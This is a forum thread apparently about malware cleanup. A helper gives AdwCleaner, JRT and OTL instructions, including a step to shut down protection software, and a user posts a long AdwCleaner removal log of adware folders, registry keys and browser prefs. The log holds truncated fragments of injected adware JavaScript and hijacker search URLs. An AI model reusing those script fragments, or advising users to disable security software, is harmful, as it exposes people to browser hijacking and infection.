=========================

bullseye_zpse9eaf36e.gif Reboot

=========================

bullseye_zpse9eaf36e.gif AdwCleaner v3: Scan & Clean
    • Windows XP : Double click on the icon to run it.
    • Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"
  • Click on the Scan button.
  • AdwCleaner will begin to scan your computer like it did before.
  • After the scan has finished...
  • Click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a log file report (AdwCleaner[S0].txt) will open automatically.
  • Copy and paste the contents of that log file in your next reply.
  • A copy of that log file will also be saved in the C:\AdwCleaner folder.
=========================

bullseye_zpse9eaf36e.gif Junkware Removal Tool

Download Junkware Removal Tool to your desktop.
    • Windows XP : Double click on the icon to run it.
    • Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"
  • Shut down your protection software now to avoid potential conflicts.
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.
=========================



It wouldn't provide an Extras.txt

Edit: I've ran it twice and still no Extras.txt

That's because you have run OTL in the past and didn't fully uninstall it. OTL won't produce an Extras.txt log on subsequent scans unless specifically asked to do so. The following instructions will allow it to create a new Extras.txt.

bullseye_zpse9eaf36e.gif Re-run OTL (it should be located on your desktop).

Windows Vista and Windows 7 & 8 users Right Click and select "Run as Administrator" on the icon to run it.
  • Make sure all other windows are closed and to let it run uninterrupted.
  • When the window appears, underneath Output at the top change it to Minimal Output.
  • Uncheck the boxes beside LOP Check and Purity Check.
  • Under Extra Registry section, select Use SafeList <-- important
  • Click the Run Scan button. Do not change any settings unless otherwise told to do so. The scan wont take long.
  • When the scan completes, it will open two notepad windows. OTL.Txt and Extras.Txt. These are saved in the same location as OTL.
    Note:The log can be located in the OTL. folder on you C:\ drive if they fail to open automatically.
  • Please copy (Edit->Select All, Edit->Copy) the contents of the file, and post it with your next reply.
=========================

In your next post please provide the following:
  • AdwCleaner[S0].txt
  • JRT.txt
  • OTL.txt
  • Extras.txt
  • What symptoms are you experiencing?

OCD

Proud Graduate of WTT Classroom
Member of UNITE

Threads will be closed if no response after 5 days








If you are satisfied with the help you have received, please consider making a donation.


#5 Midnight Sky

Midnight Sky

    New Member

  • Authentic Member
  • Pip
  • 9 posts

Posted 03 January 2014 - 03:45 PM

# AdwCleaner v3.016 - Report created 03/01/2014 at 15:59:16
# Updated 23/12/2013 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Wesley - VERONICA
# Running from : C:\Users\Wesley\Desktop\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****

Service Deleted : BCUService

***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\Babylon
Folder Deleted : C:\ProgramData\boost_interprocess
Folder Deleted : C:\ProgramData\clsoft ltd
Folder Deleted : C:\ProgramData\NCH Software
Folder Deleted : C:\ProgramData\Premium
Folder Deleted : C:\ProgramData\MAegniPic
Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Media Finder
Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MAegniPic
Folder Deleted : C:\Program Files (x86)\Conduit
Folder Deleted : C:\Program Files (x86)\DeviceVM
Folder Deleted : C:\Program Files (x86)\Industriya
Folder Deleted : C:\Program Files (x86)\MagniPic
Folder Deleted : C:\Program Files (x86)\Mobogenie
Folder Deleted : C:\Program Files (x86)\NCH Software
Folder Deleted : C:\Program Files (x86)\optimizer pro
Folder Deleted : C:\Program Files (x86)\Common Files\Software Update Utility
Folder Deleted : C:\Users\Wesley\AppData\Local\Babylon
Folder Deleted : C:\Users\Wesley\AppData\Local\Conduit
Folder Deleted : C:\Users\Wesley\AppData\Local\Ilivid Player
Folder Deleted : C:\Users\Wesley\AppData\Local\Mobogenie
Folder Deleted : C:\Users\Wesley\AppData\Local\visi_coupon
Folder Deleted : C:\Users\Wesley\AppData\LocalLow\Conduit
Folder Deleted : C:\Users\Wesley\AppData\LocalLow\Industriya
Folder Deleted : C:\Users\Wesley\AppData\Roaming\Industriya
Folder Deleted : C:\Users\Wesley\AppData\Roaming\Media Finder
Folder Deleted : C:\Users\Wesley\AppData\Roaming\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\gencrawler@some.com
Folder Deleted : C:\Users\Wesley\AppData\Roaming\NCH Software
Folder Deleted : C:\Users\Wesley\AppData\Roaming\strongvault
Folder Deleted : C:\Users\Wesley\Desktop\Tutorials
Folder Deleted : C:\Users\Wesley\Documents\Mobogenie
Folder Deleted : C:\Users\Wesley\AppData\Roaming\Mozilla\Firefox\Profiles\09qn4qhk.default\Extensions\gagd2ahqc@aeayrtlv.co.uk
Folder Deleted : C:\Users\Wesley\AppData\Roaming\Mozilla\Firefox\Profiles\09qn4qhk.default\Extensions\hcaviui4igd@iqzhydu.edu
Folder Deleted : C:\Users\Wesley\AppData\Local\Google\Chrome\User Data\Default\Extensions\ieffnjekemefjhjdaialbngjcpmgopna
File Deleted : C:\END
File Deleted : C:\Users\Wesley\AppData\Local\Temp\Searchqu.ini
File Deleted : C:\Program Files (x86)\Mozilla Firefox\plugins\npdnu.dll
File Deleted : C:\Program Files (x86)\Mozilla Firefox\plugins\npdnu.xpt
File Deleted : C:\Program Files (x86)\Mozilla Firefox\plugins\npdnupdater2.dll
File Deleted : C:\Program Files (x86)\Mozilla Firefox\plugins\npdnupdater2.xpt
File Deleted : C:\Program Files (x86)\Mozilla Firefox\searchplugins\Babylon.xml
File Deleted : C:\Users\Wesley\AppData\Roaming\Mozilla\Firefox\Profiles\09qn4qhk.default\searchplugins\Conduit.xml
File Deleted : C:\Users\Wesley\AppData\Roaming\Mozilla\Firefox\Profiles\09qn4qhk.default\searchplugins\Search_Results.xml
File Deleted : C:\Program Files (x86)\Mozilla Firefox\searchplugins\Search_Results.xml
File Deleted : C:\Users\Wesley\AppData\Roaming\Mozilla\Firefox\Profiles\09qn4qhk.default\user.js
File Deleted : C:\Windows\System32\Tasks\NCH Software

***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Deleted : HKCU\Software\Microsoft\Internet Explorer\MenuExt\Download with &Media Finder
Value Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [NextLive]
Key Deleted : HKLM\SOFTWARE\Classes\AddressBarSearch.SearchHook
Key Deleted : HKLM\SOFTWARE\Classes\AddressBarSearch.SearchHook.1
Key Deleted : HKLM\SOFTWARE\Classes\AlxSSB.AlxTBSSB
Key Deleted : HKLM\SOFTWARE\Classes\AlxSSB.AlxTBSSB.1
Key Deleted : HKLM\SOFTWARE\Classes\AlxTB2.ToolBarProxy
Key Deleted : HKLM\SOFTWARE\Classes\AlxTB2.ToolBarProxy.1
Key Deleted : HKLM\SOFTWARE\Classes\AppID\dnu.EXE
Key Deleted : HKLM\SOFTWARE\Classes\AppID\escort.DLL
Key Deleted : HKLM\SOFTWARE\Classes\AppID\escortApp.DLL
Key Deleted : HKLM\SOFTWARE\Classes\AppID\escortEng.DLL
Key Deleted : HKLM\SOFTWARE\Classes\AppID\esrv.EXE
Key Deleted : HKLM\SOFTWARE\Classes\AppID\Toolbar.DLL
Key Deleted : HKLM\SOFTWARE\Classes\dnUpdate
Key Deleted : HKLM\SOFTWARE\Classes\dnUpdater.DownloadUIBrowser
Key Deleted : HKLM\SOFTWARE\Classes\dnUpdater.DownloadUIBrowser.1
Key Deleted : HKLM\SOFTWARE\Classes\dnUpdater.DownloadUpdController
Key Deleted : HKLM\SOFTWARE\Classes\dnUpdater.DownloadUpdController.1
Key Deleted : HKLM\SOFTWARE\Classes\escort.escortIEPane
Key Deleted : HKLM\SOFTWARE\Classes\escort.escortIEPane.1
Key Deleted : HKLM\SOFTWARE\Classes\MF
Key Deleted : HKLM\SOFTWARE\Classes\privitize.privitizeHlpr
Key Deleted : HKLM\SOFTWARE\Classes\privitize.privitizeHlpr.1
Key Deleted : HKLM\SOFTWARE\Classes\Prod.cap
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar.BandObject
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar.BandObject.1
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar.ToolbarHelperObject
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar.ToolbarHelperObject.1
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\au__rasapi32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\au__rasmancs
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\iLividSetupV1(1)_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\iLividSetupV1(1)_RASMANCS
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\Mobogenie_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\Mobogenie_RASMANCS
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\MyBabylontb_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\MyBabylontb_RASMANCS
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\optprostart_rasapi32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\optprostart_rasmancs
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\privitizevpn_1_rasapi32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\privitizevpn_1_rasmancs
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\privitizevpn_rasapi32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\privitizevpn_rasmancs
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\Searchqu Toolbar uninstall_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\Searchqu Toolbar uninstall_RASMANCS
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\SearchquMediaBar_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\SearchquMediaBar_RASMANCS
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\SetupDataMngr_Searchqu_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\SetupDataMngr_Searchqu_RASMANCS
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MobogenieAdd
Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [BCU]
Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [mobilegeni daemon]
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{09C554C3-109B-483C-A06B-F14172F1A947}
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{0A18A436-2A7A-49F3-A488-30538A2F6323}
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{1F02FB61-2BE5-4C16-8199-AEAA16EB0342}
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{6C259840-5BA8-46E6-8ED1-EF3BA47D8BA1}
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{7E8A36EA-2501-4ED3-A3C8-CFA9143FB169}
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{B12E99ED-69BD-437C-86BE-C862B9E5444D}
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{D7EE8177-D51E-4F89-92B6-83EA2EC40800}
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{EA28B360-05E0-4F93-8150-02891F1D8D3C}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{007EFBDF-8A5D-4930-97CC-A4B437CBA777}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{058F0E48-61CA-4964-9FBA-1978A1BB060D}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{18F33C35-8EF2-40D7-8BA4-932B0121B472}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1ACB5ABE-4890-4747-952C-F13BDB93FB75}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{3C471948-F874-49F5-B338-4F214A2EE0B1}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{7B089B94-D1DC-4C6B-87E1-8156E22C1D96}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{80922EE0-8A76-46AE-95D5-BD3C3FE0708D}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{B25AEDC4-8086-41E3-8349-328223FA9FCB}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{E15A9BFD-D16D-496D-8222-44CADF316E70}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{1A1BBE49-C6F1-40EA-9D2F-262F0AF6DDE3}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{1B730ACF-26A3-447B-9994-14AEE0EB72CC}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{1C888195-0160-4883-91B7-294C0CE2F277}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{2022154E-7E3E-4809-871E-1B45A6FC7058}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{292ECB89-350E-45D2-816F-52C15305B144}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{36CC2180-B6BF-4951-9578-6B0C40044AAA}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{44A36944-22C6-4A08-BC7C-161F3E540DBF}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{44B619BC-3D2B-4990-AA4F-9AA366921792}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{51F04BD6-3888-4849-864C-617FAE709CE0}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{6247DD2C-8CF9-4041-A235-93691D71B8B4}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{660E6F4F-840D-436D-B668-433D9591BAC5}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{835BED79-DF7E-4096-B355-ED43FA2EA87B}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{8C953EC4-8CFA-44FB-B32E-1249E5505091}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{8E863BD6-50DE-47D0-A6F1-3C1F6DB72451}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{99ACA0F7-D864-45CB-8C40-FD42A077E7CA}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{9DD36F1E-5111-41C5-ADED-A2A11A2FF3E4}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{A2FB8217-E320-434E-BA79-513E357AD54F}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{A9CEBBF4-9129-479A-9231-E833ED3D3A8F}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{AFD4D1F9-167C-4884-95AE-B5A9797B0D16}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{B3EAD50C-ECB0-459A-9EDA-F505AB99675B}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{C47788B1-9604-4D7A-A684-F4D450F2D7D2}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{CA3B41D0-D4C1-4808-B248-75DA27238828}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{D4A2FF6C-087F-4D40-8DFE-92AAD484BFB8}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{D88B9D5C-A9CF-4C69-906D-1CCA5D85A2EF}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{E4E394E0-D331-431F-B76D-E3A19193D5F6}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{E7435878-65B9-44D1-A443-81754E5DFC90}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{F83AF01C-AA2F-469F-8BE7-D178FB15FD07}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{6857AC4A-95B4-4E2C-B2D2-8A235FCCEF4A}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{6A4BCABA-C437-4C76-A54E-AF31B8A76CB9}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{77AA6435-2488-4A94-9FE5-49519DD2ED9B}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{841D5A49-E48D-413C-9C28-EB3D9081D705}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{92380354-381A-471F-BE2E-DD9ACD9777EA}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{D7EE8177-D51E-4F89-92B6-83EA2EC40800}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{1ACB5ABE-4890-4747-952C-F13BDB93FB75}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DF7770F7-832F-4BDF-B144-100EDDD0C3AE}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{1ACB5ABE-4890-4747-952C-F13BDB93FB75}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{7B089B94-D1DC-4C6B-87E1-8156E22C1D96}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E57091A7-B5F0-4C42-9329-72ED3E59ED31}
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0ECDF796-C2DC-4D79-A620-CCE0C0A66CC9}
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2406}
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{CFF4DB9B-135F-47C0-9269-B4C6572FD61A}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2406}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{1B730ACF-26A3-447B-9994-14AEE0EB72CC}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{1C888195-0160-4883-91B7-294C0CE2F277}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{44B619BC-3D2B-4990-AA4F-9AA366921792}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{44C3C1DB-2127-433C-98EC-4C9412B5FC3A}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{4D5132DD-BB2B-4249-B5E0-D145A8C982E1}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{660E6F4F-840D-436D-B668-433D9591BAC5}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{706D4A4B-184A-4434-B331-296B07493D2D}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{8BE10F21-185F-4CA0-B789-9921674C3993}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{94C0B25D-3359-4B10-B227-F96A77DB773F}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{99ACA0F7-D864-45CB-8C40-FD42A077E7CA}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{B0B75FBA-7288-4FD3-A9EB-7EE27FA65599}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{B173667F-8395-4317-8DD6-45AD1FE00047}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{B32672B3-F656-46E0-B584-FE61C0BB6037}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{BFE569F7-646C-4512-969B-9BE3E580D393}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{C2434722-5C85-4CA0-BA69-1B67E7AB3D68}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{C2996524-2187-441F-A398-CD6CB6B3D020}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{E047E227-5342-4D94-80F7-CFB154BF55BD}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{E3F79BE9-24D4-4F4D-8C13-DF2C9899F82E}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{E7435878-65B9-44D1-A443-81754E5DFC90}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{E77EEF95-3E83-4BB8-9C0D-4A5163774997}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2406}
Key Deleted : HKCU\Software\Alexa Internet
Key Deleted : HKCU\Software\Ask&Record
Key Deleted : HKCU\Software\Conduit
Key Deleted : HKCU\Software\DeviceVM
Key Deleted : HKCU\Software\distromatic
Key Deleted : HKCU\Software\IM
Key Deleted : HKCU\Software\ImInstaller
Key Deleted : HKCU\Software\InstallCore
Key Deleted : HKCU\Software\MediaFinder
Key Deleted : HKCU\Software\NCH Software
Key Deleted : HKCU\Software\PrivitizeVPNInstallDates
Key Deleted : HKCU\Software\StartSearch
Key Deleted : HKCU\Software\YahooPartnerToolbar
Key Deleted : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKCU\Software\AppDataLow\Software\Conduit
Key Deleted : HKCU\Software\AppDataLow\Software\ConduitSearchScopes
Key Deleted : HKCU\Software\AppDataLow\Software\SmartBar
Key Deleted : HKLM\Software\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKLM\Software\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Deleted : HKLM\Software\{6791A2F3-FC80-475C-A002-C014AF797E9C}
Key Deleted : HKLM\Software\Babylon
Key Deleted : HKLM\Software\Conduit
Key Deleted : HKLM\Software\DeviceVM
Key Deleted : HKLM\Software\NCH Software
Key Deleted : HKLM\Software\SP Global
Key Deleted : HKLM\Software\SProtector
Key Deleted : HKLM\Software\systweak
Key Deleted : HKLM\Software\Uniblue
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\incredibar
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SoftwareUpdUtility
Key Deleted : [x64] HKLM\SOFTWARE\Amazon Browser Bar
Key Deleted : [x64] HKLM\SOFTWARE\DataMngr
Key Deleted : [x64] HKLM\SOFTWARE\Tarma Installer
Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\incredibar

***** [ Browsers ] *****

-\\ Internet Explorer v9.0.8112.16421


-\\ Mozilla Firefox v26.0 (en-US)

[ File : C:\Users\Wesley\AppData\Roaming\Mozilla\Firefox\Profiles\09qn4qhk.default\prefs.js ]

Line Deleted : user_pref("CT3295465.FF19Solved", "true");
Line Deleted : user_pref("CT3295465.UserID", "UN42594005009011554");
Line Deleted : user_pref("CT3295465.addressUrlXPETakeover", "true");
Line Deleted : user_pref("CT3295465.autoDisableScopes", -1);
Line Deleted : user_pref("CT3295465.browser.search.defaultthis.engineName", "true");
Line Deleted : user_pref("CT3295465.defaultSearchXPETakeover", "true");
Line Deleted : user_pref("CT3295465.installDate", "20/4/2013 11:47:17");
Line Deleted : user_pref("CT3295465.installSessionId", "{EEFC926F-7F3C-484E-A50E-70680719E365}");
Line Deleted : user_pref("CT3295465.installSp", "TRUE");
Line Deleted : user_pref("CT3295465.installerVersion", "1.4.1.3");
Line Deleted : user_pref("CT3295465.keyword", "true");
Line Deleted : user_pref("CT3295465.searchRevert", "false");
Line Deleted : user_pref("CT3295465.searchUserMode", "2");
Line Deleted : user_pref("CT3295465.smartbar.homepage", "true");
Line Deleted : user_pref("CT3295465.startPageXPETakeover", "true");
Line Deleted : user_pref("CT3295465.versionFromInstaller", "10.15.2.23");
Line Deleted : user_pref("F97EE4FB-7FA2-4F3D-898E-023BE2EC3F83.license", "o04Nk0Ddd8Gbi8eaarYxwsAe9uwIq6jFsXLm%2BD4IFypX%2FSdECWvFl53TkmFIpO9dWDHKxI5zJ3cEmHp8TqipEsLh93Nhs%2Fq2niP24T2pMfunUIAXGBXyepstIFlI8%2FJb%2Bmn[...]
Line Deleted : user_pref("Smartbar.ConduitHomepagesList", "hxxp://search.conduit.com/?ctid=CT3295465&octid=CT3295465&SearchSource=61&CUI=UN42594005009011554&UM=2&UP=SPCF479D00-EA80-4484-83CD-BFF597753B96");
Line Deleted : user_pref("Smartbar.SearchFromAddressBarSavedUrl", "hxxp://searchou.com/?q={searchTerms}&id=98edcf170000000000000050b60df2d6");
Line Deleted : user_pref("aol_toolbar.default.homepage.check", false);
Line Deleted : user_pref("aol_toolbar.default.search.check", false);
Line Deleted : user_pref("browser.search.defaultthis.engineName", "BrowserPlus1 Customized Web Search");
Line Deleted : user_pref("browser.search.defaulturl", "hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3295465&CUI=UN42594005009011554&UM=2&SearchSource=3&q={searchTerms}");
Line Deleted : user_pref("browser.search.order.1", "Search The Web (privitize)");
Line Deleted : user_pref("extensions.BabylonToolbar.admin", false);
Line Deleted : user_pref("extensions.BabylonToolbar.aflt", "babsst");
Line Deleted : user_pref("extensions.BabylonToolbar.babExt", "");
Line Deleted : user_pref("extensions.BabylonToolbar.babTrack", "affID=101067");
Line Deleted : user_pref("extensions.BabylonToolbar.bbDpng", 11);
Line Deleted : user_pref("extensions.BabylonToolbar.dfltSrch", false);
Line Deleted : user_pref("extensions.BabylonToolbar.hmpg", false);
Line Deleted : user_pref("extensions.BabylonToolbar.id", "98edcf1700000000000074ea3aaa5ed7");
Line Deleted : user_pref("extensions.BabylonToolbar.instlDay", "15318");
Line Deleted : user_pref("extensions.BabylonToolbar.instlRef", "sst");
Line Deleted : user_pref("extensions.BabylonToolbar.lastDP", 11);
Line Deleted : user_pref("extensions.BabylonToolbar.lastVrsnTs", "1.5.3.1711:24:02");
Line Deleted : user_pref("extensions.BabylonToolbar.mntrFFxVrsn", "8.0");
Line Deleted : user_pref("extensions.BabylonToolbar.newTab", true);
Line Deleted : user_pref("extensions.BabylonToolbar.newTabUrl", "hxxp://search.babylon.com/?babsrc=NT_bb");
Line Deleted : user_pref("extensions.BabylonToolbar.noFFXTlbr", false);
Line Deleted : user_pref("extensions.BabylonToolbar.prdct", "BabylonToolbar");
Line Deleted : user_pref("extensions.BabylonToolbar.propectorlck", 62168803);
Line Deleted : user_pref("extensions.BabylonToolbar.prtkDS", 0);
Line Deleted : user_pref("extensions.BabylonToolbar.prtkHmpg", 0);
Line Deleted : user_pref("extensions.BabylonToolbar.prtnrId", "babylon");
Line Deleted : user_pref("extensions.BabylonToolbar.ptch_0717", true);
Line Deleted : user_pref("extensions.BabylonToolbar.smplGrp", "none");
Line Deleted : user_pref("extensions.BabylonToolbar.srcExt", "ss");
Line Deleted : user_pref("extensions.BabylonToolbar.tlbrId", "base");
Line Deleted : user_pref("extensions.BabylonToolbar.vrsn", "1.5.3.17");
Line Deleted : user_pref("extensions.BabylonToolbar.vrsnTs", "1.5.3.1711:24:02");
Line Deleted : user_pref("extensions.BabylonToolbar.vrsni", "1.5.3.17");
Line Deleted : user_pref("extensions.gencrawler@some.com.install-event-fired", true);
Line Deleted : user_pref("extensions.jCIi_.scode", "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};var _wlst={lsKey:\"ssjsmn2ja8ddw2a\",get:function(b,a){if(3<b)return a(!1);var d=t[...]
Line Deleted : user_pref("extensions.lUT.scode", "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};var _wlst={lsKey:\"ssjsmn2ja8ddw2a\",get:function(b,a){if(3<b)return a(!1);var d=thi[...]
Line Deleted : user_pref("extensions.privitize.srchPrvdr", "Search The Web (privitize)");
Line Deleted : user_pref("smartbar.conduitHomepageList", "hxxp://search.conduit.com/?ctid=CT3295465&CUI=UN42594005009011554&UM=2&SearchSource=13,hxxp://search.conduit.com/?ctid=CT3295465&octid=CT3295465&SearchSource[...]
